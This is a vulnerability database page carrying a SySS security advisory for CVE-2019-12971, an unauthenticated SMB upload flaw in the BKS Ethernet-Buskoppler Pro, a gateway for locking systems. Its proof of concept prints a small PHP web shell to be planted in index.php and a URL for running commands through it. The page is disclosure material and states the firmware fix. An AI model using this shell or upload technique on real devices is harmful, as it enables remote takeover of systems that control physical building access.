Vulners
Lucene search
BKS EBK Ethernet-Buskoppler Pro Shell Upload Vulnerability
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | CVE-2019-12971 | 5 Jul 201922:59 | – | circl |
 | EBK BKS Buskoppler Remote Code Execution Vulnerability | 4 Jul 201900:00 | – | cnvd |
 | CVE-2019-12971 | 5 Jul 201919:39 | – | cve |
 | CVE-2019-12971 | 5 Jul 201919:39 | – | cvelist |
 | EUVD-2019-4546 | 7 Oct 202500:30 | – | euvd |
 | CVE-2019-12971 | 5 Jul 201920:15 | – | nvd |
 | CVE-2019-12971 | 5 Jul 201920:15 | – | osv |
 | BKS EBK Ethernet-Buskoppler Pro Shell Upload | 3 Jul 201900:00 | – | packetstorm |
 | Unrestricted file upload | 5 Jul 201920:15 | – | prion |
 | CVE-2019-12971 | 22 May 202508:12 | – | redhatcve |
10
Product: BKS EBK Ethernet-Buskoppler Pro
Manufacturer: BKS GmbH
Affected Version(s): < 3.01
Vulnerability Type: Unrestricted Upload of File with Dangerous Type (CWE-434)
Risk Level: High
Solution Status: Fixed
Manufacturer Notification: April 23, 2019
Solution Date: June 14, 2019
Public Disclosure: July 03, 2019
CVE Reference: CVE-2019-12971
Author of Advisory: Sebastian Auwaerter, SySS GmbH
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Overview:
The "EBK Ethernet-Buskoppler Pro" appliance provided by BKS GmbH is a
gateway to communicate with the access terminals of BKS locking systems.
The appliance is generally attached to a company's IP-based network and
communicates with the locking systems via a proprietary bus system.
Due to an unauthenticated upload functionality through Samba, the BKS
Ethernet-Buskoppler Pro is vulnerable to remote code execution.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerability Details:
An unauthenticated attacker can connect to an Ethernet-Buskoppler Pro
using any client that supports uploading files via SMB (e.g. smbclient,
Nautilus, Windows Explorer) and overwrite files located in the web root
directory of the appliance. After adding a web shell to any of the
existing PHP scripts, the attacker can execute it by accessing the
edited script via the web server listening on the TCP port 443.
According to BKS, only Appliances based on a Raspberry Pi 3 are affected
since the vulnerability has been introduced during an upgrade from
Raspberry Pi 2 to 3.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Proof of Concept (PoC):
As proof-of-concept, the file index.php can be altered via SMB
(e.g. gedit smb://<VULNERABLE_HOST>/webinterface/index.php) to allow a
web shell in the context of the user account www-data:
- ----------------
index.php:
<?php
if ($_REQUEST['pw'] === "very-secure-password"){
system($_REQUEST['cmd']);
}
set_include_path('/var/www/ebkpro_website');
include 'include/debug.php';
[...]
- ----------------
The web shell can then be used to execute commands by navigating to the
following URL:
http://<VULNERABLE_HOST>:80/index.php?pw=very-secure-password&cmd=<COMMAND>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Solution:
BKS provides update packages for the EBK Ethernet-Buskoppler. The updater
in version 1.2.1.2 contains firmware version 3.01 which fixes the
vulnerability.
# 0day.today [2019-07-04] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
03 Jul 2019 00:00Current
0.2Low risk
Vulners AI Score0.2
EPSS0.00715